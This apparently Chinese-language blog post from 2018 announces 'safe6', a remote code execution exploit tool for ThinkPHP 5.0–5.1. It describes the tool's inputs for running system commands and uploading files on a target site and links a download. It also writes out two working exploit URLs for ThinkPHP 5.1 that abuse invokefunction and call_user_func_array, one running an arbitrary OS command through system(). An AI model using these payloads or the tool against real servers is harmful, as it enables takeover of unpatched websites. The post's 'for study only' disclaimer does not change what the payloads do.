ThinkPHP5远程代码执行exp利用工具safe6

影响范围：ThinkPHP 5.0 - 5.1版本。

危害：远程代码执行

目前，ThinkPHP已发布新版本修复此漏洞，请广大ThinkPHP站长尽快升级：

https://blog.thinkphp.cn/869075

 

2018.12.11

说明：

漏洞检测，5.0和5.1都可以检测。

命令执行，文件上传只支持5.0版本tp。5.1和5.0利用大同小异，不打算写。这只是个练手作品，也勉强可以用。

还是老样子，用bat打开，不然看不到日志输出。

url:需要加http，不支持https检测。

命令：命令就是系统命令，各位都懂。

文件名：上传到服务器的文件名。

好多回显没处理，勉强用吧

网站被我不小心重置系统，月底重开。

www.safe6.c

 

 

免责声明：
safe出品的所有程序，仅限用于学习和研究目的；不得将上述内容用于商业或者非法用途，否则，一切后果请用户自负。

5.1 的exp

命令执行:
http://url/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=操作系统命令

代码执行:
http://url/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

 

链接：https://pan.baidu.com/s/1dGazL6_INj85HhCt1yxIKA 提取码：r0aa